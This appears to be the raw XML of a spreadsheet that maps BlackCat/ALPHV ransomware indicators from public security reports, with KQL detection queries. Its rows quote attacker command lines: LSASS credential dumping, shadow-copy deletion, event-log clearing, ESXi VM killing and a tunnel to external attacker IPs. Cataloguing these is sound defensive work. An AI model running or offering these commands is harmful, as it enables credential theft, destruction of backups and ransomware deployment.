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2CCED972-89FA-7A46-BDDF-6F54C4C4EF86}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="80" yWindow="-21100" windowWidth="38080" windowHeight="20800" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
  </bookViews>
  <sheets>
    <sheet name="sheet1" sheetId="1" r:id="rId1"/>
    <sheet name="Sheet2" sheetId="2" r:id="rId2"/>
  </sheets>
  <calcPr calcId="181029"/>
  <pivotCaches>
    <pivotCache cacheId="3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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="567" uniqueCount="299">
  <si>
    <t>eid</t>
  </si>
  <si>
    <t>map_pid</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>evidence</t>
  </si>
  <si>
    <t>ns_meta</t>
  </si>
  <si>
    <t>eid_type</t>
  </si>
  <si>
    <t>alphv-eid0001</t>
  </si>
  <si>
    <t>Targets
• Windows, 7 to 11, as well as Server 2008r2, 2012,
2016, 2019, 2022 (XP and 2003 can be encrypted
over Server Message Block
• ESXI (at least versions 5.5, 6.5, 7.0.2u)
• Debian (at least versions 7,8 and 9)
• Ubuntu (at least versions 18.04 and 20.04)
• ReadyNAS
• Synology</t>
  </si>
  <si>
    <t>{ "data": "2023-01012", "url": "https://www.hhs.gov/sites/default/files/royal-blackcat-ransomware-tlpclear.pdf", "tags": ["blackcat", "alphv"]}</t>
  </si>
  <si>
    <t>alphv-eid0002</t>
  </si>
  <si>
    <t>Nirsoft</t>
  </si>
  <si>
    <t>alphv-eid0003</t>
  </si>
  <si>
    <t>Mimikatz</t>
  </si>
  <si>
    <t>alphv-eid0004</t>
  </si>
  <si>
    <t>Cobalt Strike</t>
  </si>
  <si>
    <t>alphv-eid0005</t>
  </si>
  <si>
    <t>ADRecon</t>
  </si>
  <si>
    <t>alphv-eid0006</t>
  </si>
  <si>
    <t>PsExec</t>
  </si>
  <si>
    <t>alphv-eid0007</t>
  </si>
  <si>
    <t>Emotet</t>
  </si>
  <si>
    <t>alphv-eid0008</t>
  </si>
  <si>
    <t>Softperfect Netscan</t>
  </si>
  <si>
    <t>alphv-eid0009</t>
  </si>
  <si>
    <t>Bloodhound</t>
  </si>
  <si>
    <t>alphv-eid0010</t>
  </si>
  <si>
    <t>CrackMapExec</t>
  </si>
  <si>
    <t>alphv-eid0011</t>
  </si>
  <si>
    <t>MegaSync</t>
  </si>
  <si>
    <t>alphv-eid0012</t>
  </si>
  <si>
    <t>InVeigh</t>
  </si>
  <si>
    <t>alphv-eid0013</t>
  </si>
  <si>
    <t>AdFind</t>
  </si>
  <si>
    <t>alphv-eid0014</t>
  </si>
  <si>
    <t>Rubeus</t>
  </si>
  <si>
    <t>alphv-eid0015</t>
  </si>
  <si>
    <t>StealBit</t>
  </si>
  <si>
    <t>alphv-eid0016</t>
  </si>
  <si>
    <t>"C:\&lt;path&gt;\v1.0\powershell.exe -WindowStlye Hidden -C $path = 'C:\Users\user\Desktop\&lt;name&gt;.exe; Get-Process | Where-Object {$_.Path -like $path} | Stop-Process -Force;[byte[]]$arr = new-object byte[] 65536;Set-Content -Path $path -Value $arr;Remove-Item -Path $path;</t>
  </si>
  <si>
    <t>alphv-eid0017</t>
  </si>
  <si>
    <t>generic</t>
  </si>
  <si>
    <t>c:\windows\system32\windowspowershell\v1.0\powershell.exe -command  &amp; {(get-content c:\system -raw | set-content c:\ -stream 'cachetask')}
c:\windows\system32\schtasks.exe /create /ru system /sc minute /tn microsoft\windows\wininet\cachetask /tr c:\:cachetask -b &lt;bind port&gt; /f
c:\windows\system32\schtasks.exe /run /tn microsoft\windows\wininet\cachetask</t>
  </si>
  <si>
    <t>During the BlackCat attack, the actors used a tool called reverse-ssh, compiled with the C2 server address embedded, to set up reverse SSH tunnels and provide reverse shells to the attacker. Reverse-ssh was deployed to C:\ directory and named: system, Windows or cache task.
It was also observed hidden by writing to an alternate data stream (ADS) of the C:\ directory using the following command:</t>
  </si>
  <si>
    <t>{ "data": "2022-03-17", "url": "https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/", "tags": ["blackmatter", "blackcat", "alphv"]}</t>
  </si>
  <si>
    <t>c:\windows\system32\schtasks.exe /create /ru system /sc minute /tn microsoft\windows\wininet\cachetask /tr c:\:cachetask -b &lt;bind port&gt; /f</t>
  </si>
  <si>
    <t>c:\windows\system32\schtasks.exe /run /tn microsoft\windows\wininet\cachetask</t>
  </si>
  <si>
    <t>c:\windows\system32\reg.exe add hklm\software\microsoft\windows nt\currentversion\image file execution options\taskmgr.exe /v debugger /t reg_sz /d c:\system</t>
  </si>
  <si>
    <t>cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows wsus update /tr c:\windows\temp\system.exe -l socks5://127.0.0.1:3388 /st 12:00 /f cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows defender /tr c:\windows\temp\system.exe -l rtcp://0.0.0.0:1116/127.0.0.1:3388 -f mwss://52[.]149[.]228[.]45:443 /st 12:00 /f cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows wsus update /tr c:\windows\temp\system.exe -l socks5://127.0.0.1:3388 /st 12:00 /f cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows defender /tr c:\windows\temp\system.exe -l rtcp://0.0.0.0:1117/127.0.0.1:3388 -f mwss://20[.]46[.]245[.]56:443 /st 12:00 /f</t>
  </si>
  <si>
    <t>c:\windows\system32\wevtutil.exe set-log microsoft-windows-taskscheduler/operational /enabled:false</t>
  </si>
  <si>
    <t>c:\users\&lt;username&gt;\downloads\gmer\gmer.exe</t>
  </si>
  <si>
    <t>c:\windows\system\procdump.exe -accepteula -ma lsass.exe lsass.dmp</t>
  </si>
  <si>
    <t>c:\windows\system\dumpert.exe lsass.exe</t>
  </si>
  <si>
    <t>powershell rundll32.exe c:\windows\system32\comsvcs.dll, minidump (get-process lsass).id c:\temp\lsass.dmp full</t>
  </si>
  <si>
    <t>cmd.exe /q /c steal.exe 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1 cmd.exe /q /c cd results 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1 cmd.exe /q /c dir 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1  cmd.exe /q /c del archive.zip 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1 cmd.exe /q /c del c:\steal.exe 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t xml:space="preserve">hackbrowerdata </t>
  </si>
  <si>
    <t>cmd.exe /c c:\programdata\system\svchost.exe /hide /auto:c:\programdata\system\192.xml /range:192.168.0.0-192.168.255.255 c:\programdata\system\svchost.exe /hide /auto:c:\programdata\system\192.xml /range:192.168.0.0-192.168.255.255 cmd.exe /c c:\programdata\system\svchost.exe /hide /auto:c:\programdata\system\192.xml /range:192.168.0.0-192.168.255.255</t>
  </si>
  <si>
    <t>c:\windows\system32\windowspowershell\v1.0\powershell.exe -exec bypass .\adrecon.ps1</t>
  </si>
  <si>
    <t>cmd.exe /q /c teamviewer.exe --getid cmd.exe /q /c dir c:"program files cmd.exe /q /c dir c:"program files (x86) 1 cmd.exe /q /c dir c:"program files (x86)\teamviewer\ cmd.exe /q /c c:"program files (x86)\teamviewer\teamviewer.exe --getid</t>
  </si>
  <si>
    <t>cmd.exe /q /c c:"program files (x86)\teamviewer\teamviewer.exe -info</t>
  </si>
  <si>
    <t>cmd.exe /q /c dir c:"program files (x86)\
cmd.exe /q /c dir c:"program files (x86)"keepass password safe 2\
cmd.exe /q /c type c:"program files (x86)"keepass password safe 2\keepass.exe.config</t>
  </si>
  <si>
    <t>1&gt; \\127.0.0.1\admin$\__&lt;timestamp&gt;.&lt;6 digits&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>cmd.exe /q /c netsh advfirewall firewall add rule name=service dir=in protocol=tcp localport=5985 action=permit 1&gt; \\127.0.0.1\c$\windows\temp\qaiumg 2&gt;&amp;1</t>
  </si>
  <si>
    <t>c:\windows\system32\wevtutil.exe set-log active directory web services /enabled:false</t>
  </si>
  <si>
    <t>c:\windows\system32\wevtutil.exe set-log application /enabled:false</t>
  </si>
  <si>
    <t>c:\windows\system32\wevtutil.exe set-log hardwareevents /enabled:false</t>
  </si>
  <si>
    <t>c:\windows\system32\wevtutil.exe set-log internet explorer /enabled:false</t>
  </si>
  <si>
    <t>cmd.exe /q /c reg add hkey_local_machine\system\currentcontrolset\control\lsa /v disablerestrictedadmin /t reg_dword /d 0 1&gt; \\127.0.0.1\admin\$\__&lt;timestamp&gt;\.&lt;num&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>cmd.exe /q /c #upload c:\users\&lt;user&gt;\documents\&lt;doc&gt; /home/kali/desktop/&lt;doc&gt; 1&gt; \\127.0.0.1\admin$\&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>cmd.exe /q /c #download c:\users\&lt;user&gt;\documents\&lt;doc&gt; /home/kali/desktop/&lt;doc&gt; 1&gt; \\127.0.0.1\admin$\&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>c:\windows\system32\windowspowershell\v1.0\powershell.exe -exec bypass .\apply.ps1</t>
  </si>
  <si>
    <t>cmd.exe /q /c gpupdate /force</t>
  </si>
  <si>
    <t>cmd.exe /c \\&lt;domaincontroller&gt;\netlogon\defender.vbs</t>
  </si>
  <si>
    <t>cmd.exe /c \\&lt;domaincontroller&gt;\netlogon\def.vbs</t>
  </si>
  <si>
    <t>cmd.exe -c \\&lt;domain controller&gt;\netlogon\&lt;num&gt;.exe --access-token &lt;token&gt;</t>
  </si>
  <si>
    <t>cmd.exe -c \\&lt;domain controller&gt;\netlogon\&lt;num&gt;.exe</t>
  </si>
  <si>
    <t>c:\windows\system32\cmd.exe /c fsutil behavior set symlinkevaluation r2l:1</t>
  </si>
  <si>
    <t>c:\windows\system32\cmd.exe /c reg add hkey_local_machine\system\currentcontrolset\services\lanmanserver\parameters /v maxmpxct /d 65535 /t reg_dword /f c:\windows\system32\cmd.exe /c fsutil behavior set symlinkevaluation r2r:1</t>
  </si>
  <si>
    <t>c:\windows\system32\cmd.exe /c vssadmin.exe delete shadows /all /quiet c:\windows\system32\cmd.exe /c wmic.exe shadowcopy delete c:\windows\system32\cmd.exe /c arp -a c:\windows\system32\cmd.exe /c bcdedit /set {default}</t>
  </si>
  <si>
    <t>c:\windows\system32\cmd.exe /c cmd.exe /c for /f "tokens=*" %1 in ('wevtutil.exe el') do wevtutil.exe cl "%1"</t>
  </si>
  <si>
    <t>c:\windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no</t>
  </si>
  <si>
    <t>cmd.exe /c “arp -a”</t>
  </si>
  <si>
    <t>{ "url": "https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware/", "tags": [ "blackcat", "alphv"]}</t>
  </si>
  <si>
    <t>/c “reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f”</t>
  </si>
  <si>
    <t>cmd.exe /c for /F “tokens=*” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl %1</t>
  </si>
  <si>
    <t>cmd.exe /c “bcdedit /set {default} recoveryenabled No”</t>
  </si>
  <si>
    <t>cmd.exe /c “bcdedit /set {default}”</t>
  </si>
  <si>
    <t>cmd.exe /c “wmic.exe Shadowcopy Delete”</t>
  </si>
  <si>
    <t>cmd.exe /c “vssadmin.exe Delete Shadows /all /quiet”</t>
  </si>
  <si>
    <t>cmd.exe /c “iisreset.exe /stop”</t>
  </si>
  <si>
    <t>cmd.exe /c “fsutil behavior set SymlinkEvaluation R2R:1”</t>
  </si>
  <si>
    <t>cmd.exe /c “fsutil behavior set SymlinkEvaluation R2L:1”</t>
  </si>
  <si>
    <t>cmd.exe /c “wmic csproduct get UUID”</t>
  </si>
  <si>
    <t>named_pipe</t>
  </si>
  <si>
    <t>\\.\pipe\__rust_anonymous_pipe1__.&lt;Process ID&gt;.&lt;Random number&gt;</t>
  </si>
  <si>
    <t>wmic csproduct get UUID</t>
  </si>
  <si>
    <t>{ "url": "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware", "tags": [ "blackcat", "alphv"]}</t>
  </si>
  <si>
    <t>fsutil behavior set SymlinkEvaluation R2L:1</t>
  </si>
  <si>
    <t>fsutil behavior set SymlinkEvaluation R2R:1</t>
  </si>
  <si>
    <t>iisreset.exe /stop</t>
  </si>
  <si>
    <t>reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f</t>
  </si>
  <si>
    <t>vssadmin.exe delete shadows /all /quiet</t>
  </si>
  <si>
    <t>wmic shaodwcopy delete</t>
  </si>
  <si>
    <t>bcdedit /set {default} recoveryenabled No</t>
  </si>
  <si>
    <t xml:space="preserve">cmd.exe /c for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\" </t>
  </si>
  <si>
    <t xml:space="preserve">esxcli --formatter=csv --format-param=fields=="WorldID,DisplayName" vm process list </t>
  </si>
  <si>
    <t xml:space="preserve">awk -F "\"*,\"*" '{system("esxcli vm process kill --type=force --world-id="$1)}' </t>
  </si>
  <si>
    <t>for i in `vim-cmd vmsvc/getallvms| awk '{print$1}'`;do vim-cmd vmsvc/snapshot.removeall $i &amp; done</t>
  </si>
  <si>
    <t>file_path</t>
  </si>
  <si>
    <t xml:space="preserve"> “D:\my\Documents\Visual Studio 2019\setup\obj\Release\setup.pdb”. </t>
  </si>
  <si>
    <t xml:space="preserve">wmic csproduct get UUID </t>
  </si>
  <si>
    <t>{"date":"2023-04-14",  "url": "https://www.varonis.com/blog/blackcat-ransomware", "tags": [ "blackcat", "alphv"]}</t>
  </si>
  <si>
    <t xml:space="preserve">fsutil behavior set SymlinkEvaluation R2R:1 </t>
  </si>
  <si>
    <t xml:space="preserve">reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f </t>
  </si>
  <si>
    <t xml:space="preserve">psexec.exe -accepteula \\&lt;TARGET_HOST&gt; -u &lt;USERNAME&gt; -p &lt;PASSWORD&gt; -s -d -f -c &lt;ALPHV_EXECUTABLE&gt; [FLAGS] [OPTIONS] --access-token &lt;ACCESS_TOKEN&gt; [SUBCOMMAND] </t>
  </si>
  <si>
    <t xml:space="preserve">vssadmin.exe delete shadows /all /quiet </t>
  </si>
  <si>
    <t xml:space="preserve">arp -a </t>
  </si>
  <si>
    <t xml:space="preserve">HKEY_USERS\&lt;SID&gt;\Control Panel\Desktop\WallPaper = "C:\\Users\\&lt;USERNAME&gt;\\Desktop\\RECOVER-&lt;ENCRYPTED_FILE_EXTENSION&gt;-FILES.txt.png" </t>
  </si>
  <si>
    <t xml:space="preserve">for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\"" </t>
  </si>
  <si>
    <t xml:space="preserve">for i in `vim-cmd vmsvc/getallvms| awk '{print$1}'`;do vim-cmd vmsvc/snapshot.removeall $i &amp; done </t>
  </si>
  <si>
    <t xml:space="preserve">esxcli --formatter=csv --format-param=fields=="WorldID,DisplayName" vm process list | awk -F "\"*,\"*" '{system("esxcli vm process kill --type=force --world-id="$1)}' </t>
  </si>
  <si>
    <t>for i in `vim-cmd vmsvc/getallvms | awk '{print$1}'`;do vim-cmd vmsvc/snapshot.removeall $i &amp; done</t>
  </si>
  <si>
    <t>vssadmin.exe Delete Shadows /all /quiet</t>
  </si>
  <si>
    <t>{ "data": "2022-06-22", "url": "https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/", "tags": ["alphv", "blackcat"]}</t>
  </si>
  <si>
    <t>wmic.exe Shadowcopy Delete</t>
  </si>
  <si>
    <t>reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services \LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f</t>
  </si>
  <si>
    <t>for /F \”tokens=*\” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl \”%1\”</t>
  </si>
  <si>
    <t>net use \\[computer name]  /user:[domain]\[user] [password] /persistent:no</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe” /c “bcdedit /set {default}”</t>
  </si>
  <si>
    <t>“C:\Windows\system32\cmd.exe” /c “bcdedit /set {default} recoveryenabled No”</t>
  </si>
  <si>
    <t>“C:\Windows\system32\cmd.exe” /c “vssadmin.exe Delete Shadows /all /quiet”</t>
  </si>
  <si>
    <t>“C:\Windows\system32\cmd.exe” /c “wmic.exe Shadowcopy Delete”</t>
  </si>
  <si>
    <t>“C:\Windows\system32\cmd.exe” /c “cmd.exe /c  for /F \”tokens=*\” Incorrect function. in (‘ wevtutil.exe el ‘) DO wevtutil.exe cl \”Incorrect function. \””</t>
  </si>
  <si>
    <t>Get-ADRGPO</t>
  </si>
  <si>
    <t>Get-ADRDNSZone</t>
  </si>
  <si>
    <t>Get-ADRGPLink</t>
  </si>
  <si>
    <t>An active ‘BlackCat’ ransomware was detected
‘BlackCat’ ransomware was detected
BlackCat ransomware</t>
  </si>
  <si>
    <t>kql</t>
  </si>
  <si>
    <t>DeviceProcessEvents
| where InitiatingProcessFolderPath has "PerfLogs"
| where InitiatingProcessFileName matches regex "[a-z]{3}.exe"
| extend Length = strlen(InitiatingProcessFileName)
| where Length == 7</t>
  </si>
  <si>
    <t>Suspicious process execution in PerfLogs path</t>
  </si>
  <si>
    <t>DeviceProcessEvents
| where ProcessCommandLine has_all("LanmanServer", "parameters", "MaxMpxCt", "65535")</t>
  </si>
  <si>
    <t>Suspicious registry modification of MaxMpxCt parameters</t>
  </si>
  <si>
    <t>DeviceProcessEvents
| where ProcessCommandLine has_all("--access-token", "-v") 
| extend CommandArguments = split(ProcessCommandLine, " ")
| mv-expand CommandArguments
| where CommandArguments matches regex "^[A-Fa-f0-9]{64}$"</t>
  </si>
  <si>
    <t>Suspicious command line indicative of BlackCat ransom payload execution</t>
  </si>
  <si>
    <t>DeviceProcessEvents
| where InitiatingProcessCommandLine has "--access-token"
| where ProcessCommandLine has "get uuid"</t>
  </si>
  <si>
    <t>DeviceNetworkEvents
| where InitiatingProcessCommandLine has_all("copy", "--max-age", "--ignore-existing", "--multi-thread-streams", "--transfers") and InitiatingProcessCommandLine has_any("ftp", "ssh", "-q")</t>
  </si>
  <si>
    <t>Suspected data exfiltration</t>
  </si>
  <si>
    <t>Impacket</t>
  </si>
  <si>
    <t>psexec</t>
  </si>
  <si>
    <t>Gmer</t>
  </si>
  <si>
    <t>{ "data": "2023-12-19", "url": "https://www.cisa.gov/sites/default/files/2024-03/aa23-353a-stopransomware-alphv-blackcat-update_2.pdf", "tags": ["blackcat", "alphv"]}</t>
  </si>
  <si>
    <t>htool</t>
  </si>
  <si>
    <t>Evilginx2</t>
  </si>
  <si>
    <t>Brute Ratel</t>
  </si>
  <si>
    <t>c2</t>
  </si>
  <si>
    <t>Mega</t>
  </si>
  <si>
    <t>AnyDesk</t>
  </si>
  <si>
    <t>Plink</t>
  </si>
  <si>
    <t>Ngrok</t>
  </si>
  <si>
    <t>SplashTop</t>
  </si>
  <si>
    <t>alphv-eid0018</t>
  </si>
  <si>
    <t>alphv-eid0019</t>
  </si>
  <si>
    <t>alphv-eid0020</t>
  </si>
  <si>
    <t>alphv-eid0021</t>
  </si>
  <si>
    <t>alphv-eid0022</t>
  </si>
  <si>
    <t>alphv-eid0023</t>
  </si>
  <si>
    <t>alphv-eid0024</t>
  </si>
  <si>
    <t>alphv-eid0025</t>
  </si>
  <si>
    <t>alphv-eid0026</t>
  </si>
  <si>
    <t>alphv-eid0027</t>
  </si>
  <si>
    <t>alphv-eid0028</t>
  </si>
  <si>
    <t>alphv-eid0029</t>
  </si>
  <si>
    <t>alphv-eid0030</t>
  </si>
  <si>
    <t>alphv-eid0031</t>
  </si>
  <si>
    <t>alphv-eid0032</t>
  </si>
  <si>
    <t>alphv-eid0033</t>
  </si>
  <si>
    <t>alphv-eid0034</t>
  </si>
  <si>
    <t>alphv-eid0035</t>
  </si>
  <si>
    <t>alphv-eid0036</t>
  </si>
  <si>
    <t>alphv-eid0037</t>
  </si>
  <si>
    <t>alphv-eid0038</t>
  </si>
  <si>
    <t>alphv-eid0039</t>
  </si>
  <si>
    <t>alphv-eid0040</t>
  </si>
  <si>
    <t>alphv-eid0041</t>
  </si>
  <si>
    <t>alphv-eid0042</t>
  </si>
  <si>
    <t>alphv-eid0043</t>
  </si>
  <si>
    <t>alphv-eid0044</t>
  </si>
  <si>
    <t>alphv-eid0045</t>
  </si>
  <si>
    <t>alphv-eid0046</t>
  </si>
  <si>
    <t>alphv-eid0047</t>
  </si>
  <si>
    <t>alphv-eid0048</t>
  </si>
  <si>
    <t>alphv-eid0049</t>
  </si>
  <si>
    <t>alphv-eid0050</t>
  </si>
  <si>
    <t>alphv-eid0051</t>
  </si>
  <si>
    <t>alphv-eid0052</t>
  </si>
  <si>
    <t>alphv-eid0053</t>
  </si>
  <si>
    <t>alphv-eid0054</t>
  </si>
  <si>
    <t>alphv-eid0055</t>
  </si>
  <si>
    <t>alphv-eid0056</t>
  </si>
  <si>
    <t>alphv-eid0057</t>
  </si>
  <si>
    <t>alphv-eid0058</t>
  </si>
  <si>
    <t>alphv-eid0059</t>
  </si>
  <si>
    <t>alphv-eid0060</t>
  </si>
  <si>
    <t>alphv-eid0061</t>
  </si>
  <si>
    <t>alphv-eid0062</t>
  </si>
  <si>
    <t>alphv-eid0063</t>
  </si>
  <si>
    <t>alphv-eid0064</t>
  </si>
  <si>
    <t>alphv-eid0065</t>
  </si>
  <si>
    <t>alphv-eid0066</t>
  </si>
  <si>
    <t>alphv-eid0067</t>
  </si>
  <si>
    <t>alphv-eid0068</t>
  </si>
  <si>
    <t>alphv-eid0069</t>
  </si>
  <si>
    <t>alphv-eid0070</t>
  </si>
  <si>
    <t>alphv-eid0071</t>
  </si>
  <si>
    <t>alphv-eid0072</t>
  </si>
  <si>
    <t>alphv-eid0073</t>
  </si>
  <si>
    <t>alphv-eid0074</t>
  </si>
  <si>
    <t>alphv-eid0075</t>
  </si>
  <si>
    <t>alphv-eid0076</t>
  </si>
  <si>
    <t>alphv-eid0077</t>
  </si>
  <si>
    <t>alphv-eid0078</t>
  </si>
  <si>
    <t>alphv-eid0079</t>
  </si>
  <si>
    <t>alphv-eid0080</t>
  </si>
  <si>
    <t>alphv-eid0081</t>
  </si>
  <si>
    <t>alphv-eid0082</t>
  </si>
  <si>
    <t>alphv-eid0083</t>
  </si>
  <si>
    <t>alphv-eid0084</t>
  </si>
  <si>
    <t>alphv-eid0085</t>
  </si>
  <si>
    <t>alphv-eid0086</t>
  </si>
  <si>
    <t>alphv-eid0087</t>
  </si>
  <si>
    <t>alphv-eid0088</t>
  </si>
  <si>
    <t>alphv-eid0089</t>
  </si>
  <si>
    <t>alphv-eid0090</t>
  </si>
  <si>
    <t>alphv-eid0091</t>
  </si>
  <si>
    <t>alphv-eid0092</t>
  </si>
  <si>
    <t>alphv-eid0093</t>
  </si>
  <si>
    <t>alphv-eid0094</t>
  </si>
  <si>
    <t>alphv-eid0095</t>
  </si>
  <si>
    <t>alphv-eid0096</t>
  </si>
  <si>
    <t>alphv-eid0097</t>
  </si>
  <si>
    <t>alphv-eid0098</t>
  </si>
  <si>
    <t>alphv-eid0099</t>
  </si>
  <si>
    <t>alphv-eid0100</t>
  </si>
  <si>
    <t>alphv-eid0101</t>
  </si>
  <si>
    <t>alphv-eid0102</t>
  </si>
  <si>
    <t>alphv-eid0103</t>
  </si>
  <si>
    <t>alphv-eid0104</t>
  </si>
  <si>
    <t>alphv-eid0105</t>
  </si>
  <si>
    <t>alphv-eid0106</t>
  </si>
  <si>
    <t>alphv-eid0107</t>
  </si>
  <si>
    <t>alphv-eid0108</t>
  </si>
  <si>
    <t>alphv-eid0109</t>
  </si>
  <si>
    <t>alphv-eid0110</t>
  </si>
  <si>
    <t>alphv-eid0111</t>
  </si>
  <si>
    <t>alphv-eid0112</t>
  </si>
  <si>
    <t>alphv-eid0113</t>
  </si>
  <si>
    <t>alphv-eid0114</t>
  </si>
  <si>
    <t>alphv-eid0115</t>
  </si>
  <si>
    <t>alphv-eid0116</t>
  </si>
  <si>
    <t>alphv-eid0117</t>
  </si>
  <si>
    <t>alphv-eid0118</t>
  </si>
  <si>
    <t>alphv-eid0119</t>
  </si>
  <si>
    <t>alphv-eid0120</t>
  </si>
  <si>
    <t>alphv-eid0121</t>
  </si>
  <si>
    <t>alphv-eid0122</t>
  </si>
  <si>
    <t>alphv-eid0123</t>
  </si>
  <si>
    <t>alphv-eid0124</t>
  </si>
  <si>
    <t>alphv-eid0125</t>
  </si>
  <si>
    <t>alphv-eid0126</t>
  </si>
  <si>
    <t>alphv-eid0127</t>
  </si>
  <si>
    <t>alphv-eid0128</t>
  </si>
  <si>
    <t>cmdline</t>
  </si>
  <si>
    <t>TA used HOK taskmgr dump lsass</t>
  </si>
  <si>
    <t>Instead, they opened Taskmgr.exe, created a dump file of the LSASS.exe process, and saved the file to a ZIP archive.</t>
  </si>
  <si>
    <t>mdeav_alert</t>
  </si>
  <si>
    <t>ppppp</t>
  </si>
  <si>
    <t>mimikatz-pid</t>
  </si>
  <si>
    <t>cobaltstr-pid</t>
  </si>
  <si>
    <t>psexec-pid</t>
  </si>
  <si>
    <t>netscan-pid</t>
  </si>
  <si>
    <t>adfind-pid</t>
  </si>
  <si>
    <t>Row Labels</t>
  </si>
  <si>
    <t>Grand Total</t>
  </si>
  <si>
    <t>Count of map_pid</t>
  </si>
  <si>
    <t>Count of eid_type</t>
  </si>
  <si>
    <t>procdump-pid</t>
  </si>
  <si>
    <t>comsvcs-pid, rundll-pid</t>
  </si>
  <si>
    <t>netsh-pid</t>
  </si>
  <si>
    <t>registry-pid</t>
  </si>
  <si>
    <t>teamvwr-pid</t>
  </si>
  <si>
    <t>dumpert-pid</t>
  </si>
  <si>
    <t>gmer-pid</t>
  </si>
  <si>
    <t>wmic-pid</t>
  </si>
  <si>
    <t>vss-pid</t>
  </si>
  <si>
    <t>netclt-pid</t>
  </si>
  <si>
    <t>lsass-pid</t>
  </si>
  <si>
    <t>rubeus-pid</t>
  </si>
  <si>
    <t>pshell-pid</t>
  </si>
  <si>
    <t>anydesk-pid</t>
  </si>
  <si>
    <t>vss-pid, wmic-pid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</si>
</sst>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vey Wargo" refreshedDate="45770.294168171298" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="128" xr:uid="{EF314238-927D-3A40-BA59-D6760C14918E}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table1"/>
  </cacheSource>
  <cacheFields count="6">
    <cacheField name="eid" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="map_pid" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="eid_type" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="evidence" numFmtId="0">
      <sharedItems longText="1"/>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems containsBlank="1" longText="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems count="7">
        <s v="{ &quot;data&quot;: &quot;2023-01012&quot;, &quot;url&quot;: &quot;https://www.hhs.gov/sites/default/files/royal-blackcat-ransomware-tlpclear.pdf&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2023-12-19&quot;, &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2024-03/aa23-353a-stopransomware-alphv-blackcat-update_2.pdf&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2022-03-17&quot;, &quot;url&quot;: &quot;https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/&quot;, &quot;tags&quot;: [&quot;blackmatter&quot;, &quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2022-06-22&quot;, &quot;url&quot;: &quot;https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;alphv&quot;, &quot;blackcat&quot;]}"/>
        <s v="{ &quot;url&quot;: &quot;https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware/&quot;, &quot;tags&quot;: [ &quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{ &quot;url&quot;: &quot;https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware&quot;, &quot;tags&quot;: [ &quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{&quot;date&quot;:&quot;2023-04-14&quot;,  &quot;url&quot;: &quot;https://www.varonis.com/blog/blackcat-ransomware&quot;, &quot;tags&quot;: [ &quot;blackcat&quot;, &quot;alphv&quot;]}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s v="alphv-eid0013"/>
    <s v="adfind-pid"/>
    <s v="htool"/>
    <s v="AdFind"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="alphv-eid0125"/>
    <s v="anydesk-pid"/>
    <s v="htool"/>
    <s v="AnyDesk"/>
